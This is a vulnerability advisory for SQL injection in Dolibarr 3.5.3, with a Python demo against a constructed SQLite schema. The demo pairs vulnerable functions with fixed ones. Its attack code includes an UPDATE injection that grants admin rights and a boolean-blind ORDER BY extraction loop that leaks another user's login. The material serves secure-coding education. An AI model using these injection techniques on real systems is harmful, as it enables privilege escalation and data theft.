Description
Multiple SQL injection vulnerabilities in Dolibarr ERP/CRM 3.5.3 allow remote authenticated users to execute arbitrary SQL commands via the (1) entity parameter in an update action to user/fiche.php or (2) sortorder parameter to user/group/index.php.
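The advisory names two sinks but shows no code. The block below is an added illustration, not Dolibarr code and not the advisory's own content: it reproduces the two bug patterns the parameter names suggest (an integer `entity` value concatenated into an UPDATE, and a `sortorder` value concatenated into an ORDER BY clause) against a constructed in-memory SQLite schema, shows what an authenticated user can do with each, and places the hardened form beside each one. The table and column names (`llx_user`, `llx_usergroup`, `nom`, `admin`), the function names, and the assumption that the real sinks are an UPDATE and an ORDER BY are all assumptions made for the example; the advisory does not state them.

```python
import sqlite3
import string

# Constructed in-memory schema for illustration only. It is NOT Dolibarr's real
# table layout, and none of the functions below are Dolibarr code.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE llx_user (rowid INTEGER PRIMARY KEY, login TEXT, entity INTEGER, admin INTEGER);
        INSERT INTO llx_user VALUES (1, 'admin', 1, 1), (2, 'alice', 1, 0), (3, 'bob', 2, 0);
        CREATE TABLE llx_usergroup (rowid INTEGER PRIMARY KEY, nom TEXT, entity INTEGER);
        INSERT INTO llx_usergroup VALUES (1, 'sales', 1), (2, 'support', 2), (3, 'admins', 1);
    """)
    return conn

# --- (1) an integer parameter in an update action --------------------------

def update_entity_vulnerable(conn, rowid, entity):
    """Bug pattern: the request value is pasted into the SQL text unchecked."""
    conn.execute(f"UPDATE llx_user SET entity = {entity} WHERE rowid = {rowid}")
    conn.commit()

def update_entity_fixed(conn, rowid, entity):
    """Hardened form: both values must parse as integers and are bound, not concatenated."""
    try:
        rowid_i, entity_i = int(rowid), int(entity)
    except (TypeError, ValueError):
        raise ValueError("rowid and entity must be integers")
    conn.execute("UPDATE llx_user SET entity = ? WHERE rowid = ?", (entity_i, rowid_i))
    conn.commit()

def is_admin(conn, login):
    return conn.execute("SELECT admin FROM llx_user WHERE login = ?", (login,)).fetchone()[0] == 1

# --- (2) a sort-order parameter in a list page ------------------------------

def list_groups_vulnerable(conn, sortfield, sortorder):
    """Bug pattern: ORDER BY assembled by string concatenation."""
    sql = f"SELECT rowid, nom, entity FROM llx_usergroup ORDER BY {sortfield} {sortorder}"
    return conn.execute(sql).fetchall()

SORTABLE_COLUMNS = {"rowid", "nom", "entity"}

def list_groups_fixed(conn, sortfield, sortorder):
    """Hardened form: ORDER BY cannot take bound parameters, so allowlist both parts."""
    if sortfield not in SORTABLE_COLUMNS:
        raise ValueError(f"unsupported sort column: {sortfield!r}")
    order = str(sortorder).upper()
    if order not in ("ASC", "DESC"):
        raise ValueError(f"unsupported sort order: {sortorder!r}")
    sql = f"SELECT rowid, nom, entity FROM llx_usergroup ORDER BY {sortfield} {order}"
    return conn.execute(sql).fetchall()

def blind_extract_login(conn, target_rowid, length):
    """Boolean-blind extraction through the vulnerable ORDER BY.

    Groups 'sales' (rowid 1) and 'admins' (rowid 3) share entity 1, so when the
    list is sorted by entity the secondary sort expression decides which of them
    is listed first. The injected CASE ties that tiebreak to one character of
    another user's login, so the visible row order leaks the answer.
    """
    recovered = ""
    for pos in range(1, length + 1):
        for c in string.ascii_lowercase:
            payload = (
                "ASC, CASE WHEN substr((SELECT login FROM llx_user WHERE rowid = "
                f"{target_rowid}), {pos}, 1) = '{c}' THEN rowid ELSE -rowid END"
            )
            rows = list_groups_vulnerable(conn, "entity", payload)
            if rows[0][0] == 1:  # 'sales' before 'admins' means the condition held
                recovered += c
                break
        else:
            break  # character outside the tried alphabet; stop here
    return recovered

def demo():
    conn = make_db()
    # (1): a user editing their own card smuggles an extra SET clause into the UPDATE.
    update_entity_vulnerable(conn, 3, "1, admin = 1")
    escalated = is_admin(conn, "bob")
    try:
        update_entity_fixed(conn, 3, "1, admin = 1")
        update_rejected = False
    except ValueError:
        update_rejected = True
    # (2): leak the login of rowid 1 one character at a time, then show the allowlist refusing it.
    leaked = blind_extract_login(conn, 1, 5)
    try:
        list_groups_fixed(conn, "entity", "ASC, rowid")
        order_rejected = False
    except ValueError:
        order_rejected = True
    return escalated, update_rejected, leaked, order_rejected

if __name__ == "__main__":
    print(demo())
```

The two fixes differ on purpose: an integer such as `entity` can be validated and bound as a query parameter, but ORDER BY column names and directions cannot be bound in either MySQL or SQLite, so the only safe handling of `sortorder` is to map it onto a fixed set of accepted values before it touches the SQL text.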
Remediation
References
Related Vulnerabilities
Drupal Core 9.1.x Directory Traversal (9.1.0 - 9.1.10)
Elgg URL Redirection to Untrusted Site ('Open Redirect') Vulnerability (CVE-2019-11016)
WordPress 4.1.x Multiple Vulnerabilities (4.1 - 4.1.39)
WordPress Plugin Groundhogg-Marketing Automation & CRM for WordPress SQL Injection (1.3.11.13)
XWiki Improper Control of Generation of Code ('Code Injection') Vulnerability (CVE-2023-29210)